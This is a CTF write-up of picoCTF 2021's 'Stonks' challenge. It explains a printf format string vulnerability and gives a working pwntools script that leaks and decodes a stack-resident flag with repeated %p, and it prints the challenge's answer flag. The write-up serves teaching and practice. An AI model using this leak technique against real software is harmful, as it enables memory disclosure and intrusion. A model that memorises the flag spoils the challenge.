PicoCTF-2021 Writeup
Binary Exploitation

Stonks

Last updated 2 years ago

Problem

I decided to try something no one else has before. I made a bot to automatically trade stonks for me using AI and machine learning. I wouldn't believe you if you told me it's unsecure! vuln.c nc mercury.picoctf.net 16439

Solution

  1. We can compile the C source as a 32-bit binary using gcc -g -m32 vuln.c -o vuln, and then generate a pwntools template using pwn template --host mercury.picoctf.net --port 16439 vuln.

  2. This is a standard format string vulnerability: the user-supplied API token is passed directly to printf as the format string. gcc even tells us so when we compile it, with the warning "format not a string literal and no format arguments".

  3. Resources to learn about format string attacks: Syracuse University Lecture Notes / OWASP / LiveOverflow on YouTube / John Hammond PicoCTF 2017 'I've Got a Secret' on YouTube / PicoCTF 2018 'echooo' Writeup

  4. However, my solution is based on this writeup.

  5. Essentially, the solution script works by sending a string of repeating %p to the format string function in the program. printf replaces each %p with the next word from the stack, printed in hexadecimal. Eventually we work our way up the stack far enough to reach api_buf, the stack buffer the flag was read into, and its contents come out as little-endian 4-byte words. We cannot use the looping '%{}$s'.format(i) trick from this PicoCTF 2018 'echooo' Writeup here: %s dereferences a stack word as a pointer, which works when a pointer to the flag sits on the stack, but in this program the flag bytes themselves sit on the stack, so they have to be dumped with %p and then byte-swapped because the target is little endian.

  6. Once we dump the stack, we convert the hexadecimal back into ASCII: parse each leaked word into a 4-byte array, reverse it (little endian), concatenate the words, and filter out non-printable bytes. Then we simply print the flag.
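
The steps above, carried through as an added example (this is not the writeup's own solution script). It builds the repeated %p payload, decodes printf's output back into stack bytes and searches them for the flag. Assumptions not stated on the page: the target is 32-bit so each %p is one 4-byte word, the menu is answered with 1 before the token prompt, a '|' separator is appended to each %p so the tokens split cleanly, and pwntools is only needed for the live run in main(). The sample leak is constructed inline so the decoder can be exercised offline.

```python
"""Leak a stack-resident flag through printf(user_buf) with repeated %p.

Added example for this writeup, not the original solution script.
Assumptions: 32-bit target (4-byte words), menu option "1" reaches the
API-token prompt, pwntools is installed only for the live run in main().
"""
import re
from typing import Optional

HOST, PORT = "mercury.picoctf.net", 16439   # from the challenge text
WORD = 4                                      # 32-bit build (-m32), as in the writeup
FLAG_RE = re.compile(rb"picoCTF\{[^}]*\}")
TOKEN_RE = re.compile(r"0x[0-9a-fA-F]+|\(nil\)")


def build_payload(n_words: int = 60) -> bytes:
    """'%p|' repeated: each %p pops one stack word, '|' keeps tokens separable.
    Assumption: the token is read with a whitespace-delimited scanf, so no
    spaces, and it is kept short enough for the program's input buffer."""
    return b"%p|" * n_words


def leak_to_bytes(leak: str) -> bytes:
    """Turn printf's %p output back into raw stack bytes.

    %p prints each word as 0x plus the *minimal* hex digits (0xa7d, never
    0x00000a7d) and a NULL word as '(nil)', so widen via int() rather than
    bytes.fromhex(), which would choke on odd-length strings.  Each word is
    emitted little-endian because that is how the target stores it.
    """
    out = bytearray()
    for tok in TOKEN_RE.findall(leak):
        value = 0 if tok == "(nil)" else int(tok, 16)
        out += value.to_bytes(WORD, "little")
    return bytes(out)


def extract_flag(leak: str) -> Optional[str]:
    """Search the recovered bytes for the flag; non-printable noise is ignored
    because the regex only matches the flag's own characters."""
    m = FLAG_RE.search(leak_to_bytes(leak))
    return m.group(0).decode() if m else None


def fake_leak(flag: str, noise_words=(0x804A008, 0x1, 0x0, 0xF7FA1D80)) -> str:
    """Constructed sample of what the server would print (offline testing only):
    a few unrelated stack words, then api_buf holding flag + '\\n' from fgets,
    printed word by word exactly as printf's %p would render it."""
    buf = flag.encode() + b"\n"
    buf += b"\x00" * (-len(buf) % WORD)            # pad to whole words
    words = list(noise_words)
    words += [int.from_bytes(buf[i:i + WORD], "little") for i in range(0, len(buf), WORD)]
    return "".join(("(nil)" if w == 0 else f"{w:#x}") + "|" for w in words)


def main():
    from pwn import remote   # assumption: pwntools installed; live run only
    io = remote(HOST, PORT)
    io.sendlineafter(b"portfolio", b"1")           # menu option 1: buy stonks
    io.sendlineafter(b"token?", build_payload())
    leak = io.recvall(timeout=5).decode(errors="replace")
    print(extract_flag(leak))


if __name__ == "__main__":
    main()
```

Running it against the live service prints the flag; offline, fake_leak() produces a leak string in the same shape so extract_flag() can be checked without the server. The detail most likely to bite when writing this by hand is the short %p rendering of the final word ("}\n\0\0" prints as 0xa7d), which is why the decoder widens through int() instead of bytes.fromhex().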

Flag

picoCTF{I_l05t_4ll_my_m0n3y_c7cb6cae}

Links referenced in this writeup
  • Program
  • Source
  • Syracuse University Lecture Notes
  • OWASP
  • LiveOverflow on YouTube
  • John Hammond PicoCTF 2017 'I've Got a Secret' on YouTube
  • PicoCTF 2018 'echooo' Writeup
  • this writeup
  • solution script
  • this PicoCTF 2018 'echooo' Writeup